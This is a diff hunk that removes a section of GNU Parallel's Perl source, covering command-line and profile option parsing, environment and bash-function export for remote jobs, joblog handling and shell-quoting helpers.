-sub get_options_from_array {
-    # Run GetOptions on @array
-    # Input:
-    #   $array_ref = ref to @ARGV to parse
-    #   @keep_only = Keep only these options
-    # Uses:
-    #   @ARGV
-    # Returns:
-    #   true if parsing worked
-    #   false if parsing failed
-    #   @$array_ref is changed
-    my ($array_ref, @keep_only) = @_;
-    if(not @$array_ref) {
-	# Empty array: No need to look more at that
-	return 1;
-    }
-    # A bit of shuffling of @ARGV needed as GetOptionsFromArray is not
-    # supported everywhere
-    my @save_argv;
-    my $this_is_ARGV = (\@::ARGV == $array_ref);
-    if(not $this_is_ARGV) {
-	@save_argv = @::ARGV;
-	@::ARGV = @{$array_ref};
-    }
-    # If @keep_only set: Ignore all values except @keep_only
-    my %options = options_hash();
-    if(@keep_only) {
-	my (%keep,@dummy);
-	@keep{@keep_only} = @keep_only;
-	for my $k (grep { not $keep{$_} } keys %options) {
-	    # Store the value of the option in @dummy
-	    $options{$k} = \@dummy;
-	}
-    }
-    my $retval = GetOptions(%options);
-    if(not $this_is_ARGV) {
-	@{$array_ref} = @::ARGV;
-	@::ARGV = @save_argv;
-    }
-    return $retval;
-}
-
-sub parse_options {
-    # Returns: N/A
-    # Defaults:
-    $Global::version = 20141122;
-    $Global::progname = 'parallel';
-    $Global::infinity = 2**31;
-    $Global::debug = 0;
-    $Global::verbose = 0;
-    $Global::quoting = 0;
-    # Read only table with default --rpl values
-    %Global::replace =
-	(
-	 '{}'   => '',
-	 '{#}'  => '1 $_=$job->seq()',
-	 '{%}'  => '1 $_=$job->slot()',
-	 '{/}'  => 's:.*/::',
-	 '{//}' => '$Global::use{"File::Basename"} ||= eval "use File::Basename; 1;"; $_ = dirname($_);',
-	 '{/.}' => 's:.*/::; s:\.[^/.]+$::;',
-	 '{.}'  => 's:\.[^/.]+$::',
-	);
-    %Global::plus =
-	(
-	 # {} = {+/}/{/}
-	 #    = {.}.{+.}     = {+/}/{/.}.{+.}
-	 #    = {..}.{+..}   = {+/}/{/..}.{+..}
-	 #    = {...}.{+...} = {+/}/{/...}.{+...}
-	 '{+/}' => 's:/[^/]*$::',
-	 '{+.}' => 's:.*\.::',
-	 '{+..}' => 's:.*\.([^.]*\.):$1:',
-	 '{+...}' => 's:.*\.([^.]*\.[^.]*\.):$1:',
-	 '{..}' => 's:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{...}' => 's:\.[^/.]+$::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{/..}' => 's:.*/::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{/...}' => 's:.*/::; s:\.[^/.]+$::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	);
-    # Modifiable copy of %Global::replace
-    %Global::rpl = %Global::replace;
-    $Global::parens = "{==}";
-    $/="\n";
-    $Global::ignore_empty = 0;
-    $Global::interactive = 0;
-    $Global::stderr_verbose = 0;
-    $Global::default_simultaneous_sshlogins = 9;
-    $Global::exitstatus = 0;
-    $Global::halt_on_error_exitstatus = 0;
-    $Global::arg_sep = ":::";
-    $Global::arg_file_sep = "::::";
-    $Global::trim = 'n';
-    $Global::max_jobs_running = 0;
-    $Global::job_already_run = '';
-    $ENV{'TMPDIR'} ||= "/tmp";
-
-    @ARGV=read_options();
-
-    if(@opt::v) { $Global::verbose = $#opt::v+1; } # Convert -v -v to v=2
-    $Global::debug = $opt::D;
-    $Global::shell = $ENV{'PARALLEL_SHELL'} || parent_shell($$) || $ENV{'SHELL'} || "/bin/sh";
-    if(defined $opt::X) { $Global::ContextReplace = 1; }
-    if(defined $opt::silent) { $Global::verbose = 0; }
-    if(defined $opt::0) { $/ = "\0"; }
-    if(defined $opt::d) { my $e="sprintf \"$opt::d\""; $/ = eval $e; }
-    if(defined $opt::p) { $Global::interactive = $opt::p; }
-    if(defined $opt::q) { $Global::quoting = 1; }
-    if(defined $opt::r) { $Global::ignore_empty = 1; }
-    if(defined $opt::verbose) { $Global::stderr_verbose = 1; }
-    # Deal with --rpl
-    sub rpl {
-	# Modify %Global::rpl
-	# Replace $old with $new
-	my ($old,$new) =  @_;
-	if($old ne $new) {
-	    $Global::rpl{$new} = $Global::rpl{$old};
-	    delete $Global::rpl{$old};
-	}
-    }
-    if(defined $opt::parens) { $Global::parens = $opt::parens; }
-    my $parenslen = 0.5*length $Global::parens;
-    $Global::parensleft = substr($Global::parens,0,$parenslen);
-    $Global::parensright = substr($Global::parens,$parenslen);
-    if(defined $opt::plus) { %Global::rpl = (%Global::plus,%Global::rpl); }
-    if(defined $opt::I) { rpl('{}',$opt::I); }
-    if(defined $opt::U) { rpl('{.}',$opt::U); }
-    if(defined $opt::i and $opt::i) { rpl('{}',$opt::i); }
-    if(defined $opt::basenamereplace) { rpl('{/}',$opt::basenamereplace); }
-    if(defined $opt::dirnamereplace) { rpl('{//}',$opt::dirnamereplace); }
-    if(defined $opt::seqreplace) { rpl('{#}',$opt::seqreplace); }
-    if(defined $opt::slotreplace) { rpl('{%}',$opt::slotreplace); }
-    if(defined $opt::basenameextensionreplace) {
-       rpl('{/.}',$opt::basenameextensionreplace);
-    }
-    for(@opt::rpl) {
-	# Create $Global::rpl entries for --rpl options
-	# E.g: "{..} s:\.[^.]+$:;s:\.[^.]+$:;"
-	my ($shorthand,$long) = split/ /,$_,2;
-	$Global::rpl{$shorthand} = $long;
-    }
-    if(defined $opt::eof) { $Global::end_of_file_string = $opt::eof; }
-    if(defined $opt::max_args) { $Global::max_number_of_args = $opt::max_args; }
-    if(defined $opt::timeout) { $Global::timeoutq = TimeoutQueue->new($opt::timeout); }
-    if(defined $opt::tmpdir) { $ENV{'TMPDIR'} = $opt::tmpdir; }
-    if(defined $opt::help) { die_usage(); }
-    if(defined $opt::colsep) { $Global::trim = 'lr'; }
-    if(defined $opt::header) { $opt::colsep = defined $opt::colsep ? $opt::colsep : "\t"; }
-    if(defined $opt::trim) { $Global::trim = $opt::trim; }
-    if(defined $opt::arg_sep) { $Global::arg_sep = $opt::arg_sep; }
-    if(defined $opt::arg_file_sep) { $Global::arg_file_sep = $opt::arg_file_sep; }
-    if(defined $opt::number_of_cpus) { print SSHLogin::no_of_cpus(),"\n"; wait_and_exit(0); }
-    if(defined $opt::number_of_cores) {
-        print SSHLogin::no_of_cores(),"\n"; wait_and_exit(0);
-    }
-    if(defined $opt::max_line_length_allowed) {
-        print Limits::Command::real_max_length(),"\n"; wait_and_exit(0);
-    }
-    if(defined $opt::version) { version(); wait_and_exit(0); }
-    if(defined $opt::bibtex) { bibtex(); wait_and_exit(0); }
-    if(defined $opt::record_env) { record_env(); wait_and_exit(0); }
-    if(defined $opt::show_limits) { show_limits(); }
-    if(@opt::sshlogin) { @Global::sshlogin = @opt::sshlogin; }
-    if(@opt::sshloginfile) { read_sshloginfiles(@opt::sshloginfile); }
-    if(@opt::return) { push @Global::ret_files, @opt::return; }
-    if(not defined $opt::recstart and
-       not defined $opt::recend) { $opt::recend = "\n"; }
-    if(not defined $opt::blocksize) { $opt::blocksize = "1M"; }
-    $opt::blocksize = multiply_binary_prefix($opt::blocksize);
-    if(defined $opt::controlmaster) { $opt::noctrlc = 1; }
-    if(defined $opt::semaphore) { $Global::semaphore = 1; }
-    if(defined $opt::semaphoretimeout) { $Global::semaphore = 1; }
-    if(defined $opt::semaphorename) { $Global::semaphore = 1; }
-    if(defined $opt::fg) { $Global::semaphore = 1; }
-    if(defined $opt::bg) { $Global::semaphore = 1; }
-    if(defined $opt::wait) { $Global::semaphore = 1; }
-    if(defined $opt::halt_on_error and
-       $opt::halt_on_error=~/%/) { $opt::halt_on_error /= 100; }
-    if(defined $opt::timeout and $opt::timeout !~ /^\d+(\.\d+)?%?$/) {
-	::error("--timeout must be seconds or percentage\n");
-	wait_and_exit(255);
-    }
-    if(defined $opt::minversion) {
-	print $Global::version,"\n";
-	if($Global::version < $opt::minversion) {
-	    wait_and_exit(255);
-	} else {
-	    wait_and_exit(0);
-	}
-    }
-    if(not defined $opt::delay) {
-	# Set --delay to --sshdelay if not set
-	$opt::delay = $opt::sshdelay;
-    }
-    if($opt::compress_program) {
-	$opt::compress = 1;
-	$opt::decompress_program ||= $opt::compress_program." -dc";
-    }
-    if($opt::compress) {
-	my ($compress, $decompress) = find_compression_program();
-	$opt::compress_program ||= $compress;
-	$opt::decompress_program ||= $decompress;
-    }
-    if(defined $opt::nonall) {
-	# Append a dummy empty argument
-	push @ARGV, $Global::arg_sep, "";
-    }
-    if(defined $opt::tty) {
-        # Defaults for --tty: -j1 -u
-        # Can be overridden with -jXXX -g
-        if(not defined $opt::jobs) {
-            $opt::jobs = 1;
-        }
-        if(not defined $opt::group) {
-            $opt::ungroup = 0;
-        }
-    }
-    if(@opt::trc) {
-        push @Global::ret_files, @opt::trc;
-        $opt::transfer = 1;
-        $opt::cleanup = 1;
-    }
-    if(defined $opt::max_lines) {
-	if($opt::max_lines eq "-0") {
-	    # -l -0 (swallowed -0)
-	    $opt::max_lines = 1;
-	    $opt::0 = 1;
-	    $/ = "\0";
-	} elsif ($opt::max_lines == 0) {
-	    # If not given (or if 0 is given) => 1
-	    $opt::max_lines = 1;
-	}
-	$Global::max_lines = $opt::max_lines;
-	if(not $opt::pipe) {
-	    # --pipe -L means length of record - not max_number_of_args
-	    $Global::max_number_of_args ||= $Global::max_lines;
-	}
-    }
-
-    # Read more than one arg at a time (-L, -N)
-    if(defined $opt::L) {
-	$Global::max_lines = $opt::L;
-	if(not $opt::pipe) {
-	    # --pipe -L means length of record - not max_number_of_args
-	    $Global::max_number_of_args ||= $Global::max_lines;
-	}
-    }
-    if(defined $opt::max_replace_args) {
-	$Global::max_number_of_args = $opt::max_replace_args;
-	$Global::ContextReplace = 1;
-    }
-    if((defined $opt::L or defined $opt::max_replace_args)
-       and
-       not ($opt::xargs or $opt::m)) {
-	$Global::ContextReplace = 1;
-    }
-    if(defined $opt::tag and not defined $opt::tagstring) {
-	$opt::tagstring = "\257<\257>"; # Default = {}
-    }
-    if(defined $opt::pipepart and
-       (defined $opt::L or defined $opt::max_lines
-	or defined $opt::max_replace_args)) {
-	::error("--pipepart is incompatible with --max-replace-args, ",
-		"--max-lines, and -L.\n");
-	wait_and_exit(255);
-    }
-    if(grep /^$Global::arg_sep$|^$Global::arg_file_sep$/o, @ARGV) {
-        # Deal with ::: and ::::
-        @ARGV=read_args_from_command_line();
-    }
-
-    # Semaphore defaults
-    # Must be done before computing number of processes and max_line_length
-    # because when running as a semaphore GNU Parallel does not read args
-    $Global::semaphore ||= ($0 =~ m:(^|/)sem$:); # called as 'sem'
-    if($Global::semaphore) {
-        # A semaphore does not take input from neither stdin nor file
-        @opt::a = ("/dev/null");
-        push(@Global::unget_argv, [Arg->new("")]);
-        $Semaphore::timeout = $opt::semaphoretimeout || 0;
-        if(defined $opt::semaphorename) {
-            $Semaphore::name = $opt::semaphorename;
-        } else {
-            $Semaphore::name = `tty`;
-            chomp $Semaphore::name;
-        }
-        $Semaphore::fg = $opt::fg;
-        $Semaphore::wait = $opt::wait;
-        $Global::default_simultaneous_sshlogins = 1;
-        if(not defined $opt::jobs) {
-            $opt::jobs = 1;
-        }
-	if($Global::interactive and $opt::bg) {
-	    ::error("Jobs running in the ".
-		    "background cannot be interactive.\n");
-            ::wait_and_exit(255);
-	}
-    }
-    if(defined $opt::eta) {
-        $opt::progress = $opt::eta;
-    }
-    if(defined $opt::bar) {
-        $opt::progress = $opt::bar;
-    }
-    if(defined $opt::retired) {
-	    ::error("-g has been retired. Use --group.\n");
-	    ::error("-B has been retired. Use --bf.\n");
-	    ::error("-T has been retired. Use --tty.\n");
-	    ::error("-U has been retired. Use --er.\n");
-	    ::error("-W has been retired. Use --wd.\n");
-	    ::error("-Y has been retired. Use --shebang.\n");
-	    ::error("-H has been retired. Use --halt.\n");
-	    ::error("--tollef has been retired. Use -u -q --arg-sep -- and --load for -l.\n");
-            ::wait_and_exit(255);
-    }
-    citation_notice();
-
-    parse_sshlogin();
-    parse_env_var();
-
-    if(remote_hosts() and ($opt::X or $opt::m or $opt::xargs)) {
-        # As we do not know the max line length on the remote machine
-        # long commands generated by xargs may fail
-        # If opt_N is set, it is probably safe
-        ::warning("Using -X or -m with --sshlogin may fail.\n");
-    }
-
-    if(not defined $opt::jobs) {
-        $opt::jobs = "100%";
-    }
-    open_joblog();
-}
-
-sub env_quote {
-    # Input:
-    #   $v = value to quote
-    # Returns:
-    #   $v = value quoted as environment variable
-    my $v = $_[0];
-    $v =~ s/([\\])/\\$1/g;
-    $v =~ s/([\[\] \#\'\&\<\>\(\)\;\{\}\t\"\$\`\*\174\!\?\~])/\\$1/g;
-    $v =~ s/\n/"\n"/g;
-    return $v;
-}
-
-sub record_env {
-    # Record current %ENV-keys in ~/.parallel/ignored_vars
-    # Returns: N/A
-    my $ignore_filename = $ENV{'HOME'} . "/.parallel/ignored_vars";
-    if(open(my $vars_fh, ">", $ignore_filename)) {
-	print $vars_fh map { $_,"\n" } keys %ENV;
-    } else {
-	::error("Cannot write to $ignore_filename\n");
-	::wait_and_exit(255);
-    }
-}
-
-sub parse_env_var {
-    # Parse --env and set $Global::envvar, $Global::envwarn and $Global::envvarlen
-    #
-    # Bash functions must be parsed to export them remotely
-    #   Pre-shellshock style bash function:
-    #     myfunc=() {...
-    #   Post-shellshock style bash function:
-    #     BASH_FUNC_myfunc()=() {...
-    #
-    # Uses:
-    #   $Global::envvar = eval string that will set variables in both bash and csh
-    #   $Global::envwarn = If functions are used: Give warning in csh
-    #   $Global::envvarlen = length of $Global::envvar
-    #   @opt::env
-    #   $Global::shell
-    #   %ENV
-    # Returns: N/A
-    $Global::envvar = "";
-    $Global::envwarn = "";
-    my @vars = ('parallel_bash_environment');
-    for my $varstring (@opt::env) {
-        # Split up --env VAR1,VAR2
-	push @vars, split /,/, $varstring;
-    }
-    if(grep { /^_$/ } @vars) {
-	# --env _
-	# Include all vars that are not in a clean environment
-	if(open(my $vars_fh, "<", $ENV{'HOME'} . "/.parallel/ignored_vars")) {
-	    my @ignore = <$vars_fh>;
-	    chomp @ignore;
-	    my %ignore;
-	    @ignore{@ignore} = @ignore;
-	    close $vars_fh;
-	    push @vars, grep { not defined $ignore{$_} } keys %ENV;
-	    @vars = grep { not /^_$/ } @vars;
-	} else {
-	    ::error("Run '$Global::progname --record-env' in a clean environment first.\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    # Duplicate vars as BASH functions to include post-shellshock functions.
-    # So --env myfunc should also look for BASH_FUNC_myfunc()
-    @vars = map { $_, "BASH_FUNC_$_()" } @vars;
-    # Keep only defined variables
-    @vars = grep { defined($ENV{$_}) } @vars;
-    # Pre-shellshock style bash function:
-    #   myfunc=() {  echo myfunc
-    #   }
-    # Post-shellshock style bash function:
-    #   BASH_FUNC_myfunc()=() {  echo myfunc
-    #   }
-    my @bash_functions = grep { substr($ENV{$_},0,4) eq "() {" } @vars;
-    my @non_functions = grep { substr($ENV{$_},0,4) ne "() {" } @vars;
-    if(@bash_functions) {
-	# Functions are not supported for all shells
-	if($Global::shell !~ m:/(bash|rbash|zsh|rzsh|dash|ksh):) {
-	    ::warning("Shell functions may not be supported in $Global::shell\n");
-	}
-    }
-
-    # Pre-shellschock names are without ()
-    my @bash_pre_shellshock = grep { not /\(\)/ } @bash_functions;
-    # Post-shellschock names are with ()
-    my @bash_post_shellshock = grep { /\(\)/ } @bash_functions;
-
-    my @qcsh = (map { my $a=$_; "setenv $a " . env_quote($ENV{$a})  }
-		grep { not /^parallel_bash_environment$/ } @non_functions);
-    my @qbash = (map { my $a=$_; "export $a=" . env_quote($ENV{$a}) }
-		 @non_functions, @bash_pre_shellshock);
-
-    push @qbash, map { my $a=$_; "eval $a\"\$$a\"" } @bash_pre_shellshock;
-    push @qbash, map { /BASH_FUNC_(.*)\(\)/; "$1 $ENV{$_}" } @bash_post_shellshock;
-
-    #ssh -tt -oLogLevel=quiet lo 'eval `echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\;  PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;'  tty\ \>/dev/null\ \&\&\ stty\ isig\ -onlcr\ -echo\;echo\ \$SHELL\ \|\ grep\ \"/t\\\{0,1\\\}csh\"\ \>\ /dev/null\ \&\&\ setenv\ BASH_FUNC_myfunc\ \\\(\\\)\\\ \\\{\\\ \\\ echo\\\ a\"'
-    #'\"\\\}\ \|\|\  myfunc\(\)\ \{\ \ echo\ a'
-    #'\}\ \;myfunc\ 1;
-
-    # Check if any variables contain \n
-    if(my @v = map { s/BASH_FUNC_(.*)\(\)/$1/; $_ } grep { $ENV{$_}=~/\n/ } @vars) {
-	# \n is bad for csh and will cause it to fail.
-	$Global::envwarn = ::shell_quote_scalar(q{echo $SHELL | egrep "/t?csh" > /dev/null && echo CSH/TCSH DO NOT SUPPORT newlines IN VARIABLES/FUNCTIONS. Unset }."@v".q{ && exec false;}."\n\n") . $Global::envwarn;
-    }
-
-    if(not @qcsh) { push @qcsh, "true"; }
-    if(not @qbash) { push @qbash, "true"; }
-    # Create lines like:
-    # echo $SHELL | grep "/t\\{0,1\\}csh" >/dev/null && setenv V1 val1 && setenv V2 val2 || export V1=val1 && export V2=val2 ; echo "$V1$V2"
-    if(@vars) {
-	$Global::envvar .=
-	    join"",
-	    (q{echo $SHELL | grep "/t\\{0,1\\}csh" > /dev/null && }
-	     . join(" && ", @qcsh)
-	     . q{ || }
-	     . join(" && ", @qbash)
-	     .q{;});
-	if($ENV{'parallel_bash_environment'}) {
-	    $Global::envvar .= 'eval "$parallel_bash_environment";'."\n";
-	}
-    }
-    $Global::envvarlen = length $Global::envvar;
-}
-
-sub open_joblog {
-    # Open joblog as specified by --joblog
-    # Uses:
-    #   $opt::resume
-    #   $opt::resume_failed
-    #   $opt::joblog
-    #   $opt::results
-    #   $Global::job_already_run
-    #   %Global::fd
-    my $append = 0;
-    if(($opt::resume or $opt::resume_failed)
-       and
-       not ($opt::joblog or $opt::results)) {
-        ::error("--resume and --resume-failed require --joblog or --results.\n");
-	::wait_and_exit(255);
-    }
-    if($opt::joblog) {
-	if($opt::resume || $opt::resume_failed) {
-	    if(open(my $joblog_fh, "<", $opt::joblog)) {
-		# Read the joblog
-		$append = <$joblog_fh>; # If there is a header: Open as append later
-		my $joblog_regexp;
-		if($opt::resume_failed) {
-		    # Make a regexp that only matches commands with exit+signal=0
-		    # 4 host 1360490623.067 3.445 1023 1222 0 0 command
-		    $joblog_regexp='^(\d+)(?:\t[^\t]+){5}\t0\t0\t';
-		} else {
-		    # Just match the job number
-		    $joblog_regexp='^(\d+)';
-		}
-		while(<$joblog_fh>) {
-		    if(/$joblog_regexp/o) {
-			# This is 30% faster than set_job_already_run($1);
-			vec($Global::job_already_run,($1||0),1) = 1;
-		    } elsif(not /\d+\s+[^\s]+\s+([0-9.]+\s+){6}/) {
-			::error("Format of '$opt::joblog' is wrong: $_");
-			::wait_and_exit(255);
-		    }
-		}
-		close $joblog_fh;
-	    }
-	}
-	if($append) {
-	    # Append to joblog
-	    if(not open($Global::joblog, ">>", $opt::joblog)) {
-		::error("Cannot append to --joblog $opt::joblog.\n");
-		::wait_and_exit(255);
-	    }
-	} else {
-	    if($opt::joblog eq "-") {
-		# Use STDOUT as joblog
-		$Global::joblog = $Global::fd{1};
-	    } elsif(not open($Global::joblog, ">", $opt::joblog)) {
-		# Overwrite the joblog
-		::error("Cannot write to --joblog $opt::joblog.\n");
-		::wait_and_exit(255);
-	    }
-	    print $Global::joblog
-		join("\t", "Seq", "Host", "Starttime", "JobRuntime",
-		     "Send", "Receive", "Exitval", "Signal", "Command"
-		). "\n";
-	}
-    }
-}
-
-sub find_compression_program {
-    # Find a fast compression program
-    # Returns:
-    #   $compress_program = compress program with options
-    #   $decompress_program = decompress program with options
-
-    # Search for these. Sorted by speed
-    my @prg = qw(lzop pigz pxz gzip plzip pbzip2 lzma xz lzip bzip2);
-    for my $p (@prg) {
-	if(which($p)) {
-	    return ("$p -c -1","$p -dc");
-	}
-    }
-    # Fall back to cat
-    return ("cat","cat");
-}
-
-
-sub read_options {
-    # Read options from command line, profile and $PARALLEL
-    # Uses:
-    #   $opt::shebang_wrap
-    #   $opt::shebang
-    #   @ARGV
-    #   $opt::plain
-    #   @opt::profile
-    #   $ENV{'HOME'}
-    #   $ENV{'PARALLEL'}
-    # Returns:
-    #   @ARGV_no_opt = @ARGV without --options
-
-    # This must be done first as this may exec myself
-    if(defined $ARGV[0] and ($ARGV[0] =~ /^--shebang/ or
-			     $ARGV[0] =~ /^--shebang-?wrap/ or
-			     $ARGV[0] =~ /^--hashbang/)) {
-        # Program is called from #! line in script
-	# remove --shebang-wrap if it is set
-        $opt::shebang_wrap = ($ARGV[0] =~ s/^--shebang-?wrap *//);
-	# remove --shebang if it is set
-	$opt::shebang = ($ARGV[0] =~ s/^--shebang *//);
-	# remove --hashbang if it is set
-        $opt::shebang .= ($ARGV[0] =~ s/^--hashbang *//);
-	if($opt::shebang) {
-	    my $argfile = shell_quote_scalar(pop @ARGV);
-	    # exec myself to split $ARGV[0] into separate fields
-	    exec "$0 --skip-first-line -a $argfile @ARGV";
-	}
-	if($opt::shebang_wrap) {
-            my @options;
-	    my @parser;
-	    if ($^O eq 'freebsd') {
-		# FreeBSD's #! puts different values in @ARGV than Linux' does.
-		my @nooptions = @ARGV;
-		get_options_from_array(\@nooptions);
-		while($#ARGV > $#nooptions) {
-		    push @options, shift @ARGV;
-		}
-		while(@ARGV and $ARGV[0] ne ":::") {
-		    push @parser, shift @ARGV;
-		}
-		if(@ARGV and $ARGV[0] eq ":::") {
-		    shift @ARGV;
-		}
-	    } else {
-		@options = shift @ARGV;
-	    }
-	    my $script = shell_quote_scalar(shift @ARGV);
-	    # exec myself to split $ARGV[0] into separate fields
-	    exec "$0 --internal-pipe-means-argfiles @options @parser $script ::: @ARGV";
-	}
-    }
-
-    Getopt::Long::Configure("bundling","require_order");
-    my @ARGV_copy = @ARGV;
-    # Check if there is a --profile to set @opt::profile
-    get_options_from_array(\@ARGV_copy,"profile|J=s","plain") || die_usage();
-    my @ARGV_profile = ();
-    my @ARGV_env = ();
-    if(not $opt::plain) {
-	# Add options from .parallel/config and other profiles
-	my @config_profiles = (
-	    "/etc/parallel/config",
-	    $ENV{'HOME'}."/.parallel/config",
-	    $ENV{'HOME'}."/.parallelrc");
-	my @profiles = @config_profiles;
-	if(@opt::profile) {
-	    # --profile overrides default profiles
-	    @profiles = ();
-	    for my $profile (@opt::profile) {
-		if(-r $profile) {
-		    push @profiles, $profile;
-		} else {
-		    push @profiles, $ENV{'HOME'}."/.parallel/".$profile;
-		}
-	    }
-	}
-	for my $profile (@profiles) {
-	    if(-r $profile) {
-		open (my $in_fh, "<", $profile) || ::die_bug("read-profile: $profile");
-		while(<$in_fh>) {
-		    /^\s*\#/ and next;
-		    chomp;
-		    push @ARGV_profile, shellwords($_);
-		}
-		close $in_fh;
-	    } else {
-		if(grep /^$profile$/, @config_profiles) {
-		    # config file is not required to exist
-		} else {
-		    ::error("$profile not readable.\n");
-		    wait_and_exit(255);
-		}
-	    }
-	}
-	# Add options from shell variable $PARALLEL
-	if($ENV{'PARALLEL'}) {
-	    @ARGV_env = shellwords($ENV{'PARALLEL'});
-	}
-    }
-    Getopt::Long::Configure("bundling","require_order");
-    get_options_from_array(\@ARGV_profile) || die_usage();
-    get_options_from_array(\@ARGV_env) || die_usage();
-    get_options_from_array(\@ARGV) || die_usage();
-
-    # Prepend non-options to @ARGV (such as commands like 'nice')
-    unshift @ARGV, @ARGV_profile, @ARGV_env;
-    return @ARGV;
-}
-
-sub read_args_from_command_line {
-    # Arguments given on the command line after:
-    #   ::: ($Global::arg_sep)
-    #   :::: ($Global::arg_file_sep)
-    # Removes the arguments from @ARGV and:
-    # - puts filenames into -a
-    # - puts arguments into files and add the files to -a
-    # Input:
-    #   @::ARGV = command option ::: arg arg arg :::: argfiles
-    # Uses:
-    #   $Global::arg_sep
-    #   $Global::arg_file_sep
-    #   $opt::internal_pipe_means_argfiles
-    #   $opt::pipe
-    #   @opt::a
-    # Returns:
-    #   @argv_no_argsep = @::ARGV without ::: and :::: and following args
-    my @new_argv = ();
-    for(my $arg = shift @ARGV; @ARGV; $arg = shift @ARGV) {
-        if($arg eq $Global::arg_sep
-	   or
-	   $arg eq $Global::arg_file_sep) {
-	    my $group = $arg; # This group of arguments is args or argfiles
-	    my @group;
-	    while(defined ($arg = shift @ARGV)) {
-		if($arg eq $Global::arg_sep
-		   or
-		   $arg eq $Global::arg_file_sep) {
-		    # exit while loop if finding new separator
-		    last;
-		} else {
-		    # If not hitting ::: or ::::
-		    # Append it to the group
-		    push @group, $arg;
-		}
-	    }
-
-	    if($group eq $Global::arg_file_sep
-	       or ($opt::internal_pipe_means_argfiles and $opt::pipe)
-		) {
-		# Group of file names on the command line.
-		# Append args into -a
-		push @opt::a, @group;
-	    } elsif($group eq $Global::arg_sep) {
-		# Group of arguments on the command line.
-		# Put them into a file.
-		# Create argfile
-		my ($outfh,$name) = ::tmpfile(SUFFIX => ".arg");
-		unlink($name);
-		# Put args into argfile
-		print $outfh map { $_,$/ } @group;
-		seek $outfh, 0, 0;
-		# Append filehandle to -a
-		push @opt::a, $outfh;
-	    } else {
-		::die_bug("Unknown command line group: $group");
-	    }
-	    if(defined($arg)) {
-		# $arg is ::: or ::::
-		redo;
-	    } else {
-		# $arg is undef -> @ARGV empty
-		last;
-	    }
-	}
-	push @new_argv, $arg;
-    }
-    # Output: @ARGV = command to run with options
-    return @new_argv;
-}
-
-sub cleanup {
-    # Returns: N/A
-    if(@opt::basefile) { cleanup_basefile(); }
-}
-
-sub __QUOTING_ARGUMENTS_FOR_SHELL__ {}
-
-sub shell_quote {
-    # Input:
-    #   @strings = strings to be quoted
-    # Output:
-    #   @shell_quoted_strings = string quoted with \ as needed by the shell
-    my @strings = (@_);
-    for my $a (@strings) {
-        $a =~ s/([\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377])/\\$1/g;
-        $a =~ s/[\n]/'\n'/g; # filenames with '\n' is quoted using \'
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-sub shell_quote_empty {
-    # Inputs:
-    #   @strings = strings to be quoted
-    # Returns:
-    #   @quoted_strings = empty strings quoted as ''.
-    my @strings = shell_quote(@_);
-    for my $a (@strings) {
-	if($a eq "") {
-	    $a = "''";
-	}
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-sub shell_quote_scalar {
-    # Quote the string so shell will not expand any special chars
-    # Inputs:
-    #   $string = string to be quoted
-    # Returns:
-    #   $shell_quoted = string quoted with \ as needed by the shell
-    my $a = $_[0];
-    if(defined $a) {
-	# $a =~ s/([\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377])/\\$1/g;
-	# This is 1% faster than the above
-	$a =~ s/[\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377]/\\$&/go;
-	$a =~ s/[\n]/'\n'/go; # filenames with '\n' is quoted using \'
-    }
-    return $a;
-}
-
-sub shell_quote_file {
-    # Quote the string so shell will not expand any special chars and prepend ./ if needed
-    # Input:
-    #   $filename = filename to be shell quoted
-    # Returns:
-    #   $quoted_filename = filename quoted with \ as needed by the shell and ./ if needed
-    my $a = shell_quote_scalar(shift);
-    if(defined $a) {
-	if($a =~ m:^/: or $a =~ m:^\./:) {
-	    # /abs/path or ./rel/path => skip
-	} else {
-	    # rel/path => ./rel/path
-	    $a = "./".$a;
-	}
-    }
-    return $a;
-}
-
-sub shellwords {
-    # Input:
-    #   $string = shell line
-    # Returns:
-    #   @shell_words = $string split into words as shell would do
-    $Global::use{"Text::ParseWords"} ||= eval "use Text::ParseWords; 1;";
-    return Text::ParseWords::shellwords(@_);
-}
-
-
-sub __FILEHANDLES__ {}
-
-
-sub save_stdin_stdout_stderr {
-    # Remember the original STDIN, STDOUT and STDERR
-    # and file descriptors opened by the shell (e.g. 3>/tmp/foo)
-    # Uses:
-    #   %Global::fd
-    #   $Global::original_stderr
-    #   $Global::original_stdin
-    # Returns: N/A
-
-    # Find file descriptors that are already opened (by the shell)
-    for my $fdno (1..61) {
-	# /dev/fd/62 and above are used by bash for <(cmd)
-	my $fh;
-	# 2-argument-open is used to be compatible with old perl 5.8.0
-	# bug #43570: Perl 5.8.0 creates 61 files
-	if(open($fh,">&=$fdno")) {
-	    $Global::fd{$fdno}=$fh;
-	}
-    }
-    open $Global::original_stderr, ">&", "STDERR" or
-	::die_bug("Can't dup STDERR: $!");
-    open $Global::original_stdin, "<&", "STDIN" or
-	::die_bug("Can't dup STDIN: $!");
-}
-
-sub enough_file_handles {
-    # Check that we have enough filehandles available for starting
-    # another job
-    # Uses:
-    #   $opt::ungroup
-    #   %Global::fd
-    # Returns:
-    #   1 if ungrouped (thus not needing extra filehandles)
-    #   0 if too few filehandles
-    #   1 if enough filehandles
-    if(not $opt::ungroup) {
-        my %fh;
-        my $enough_filehandles = 1;
-  	# perl uses 7 filehandles for something?
-        # open3 uses 2 extra filehandles temporarily
-        # We need a filehandle for each redirected file descriptor
-	# (normally just STDOUT and STDERR)
-	for my $i (1..(7+2+keys %Global::fd)) {
-            $enough_filehandles &&= open($fh{$i}, "<", "/dev/null");
-        }
-        for (values %fh) { close $_; }
-        return $enough_filehandles;
-    } else {
-	# Ungrouped does not need extra file handles
-	return 1;
-    }
-}
-
-sub open_or_exit {
-    # Open a file name or exit if the file cannot be opened
-    # Inputs:
-    #   $file = filehandle or filename to open
-    # Uses:
-    #   $Global::stdin_in_opt_a
-    #   $Global::original_stdin
-    # Returns:
-    #   $fh = file handle to read-opened file
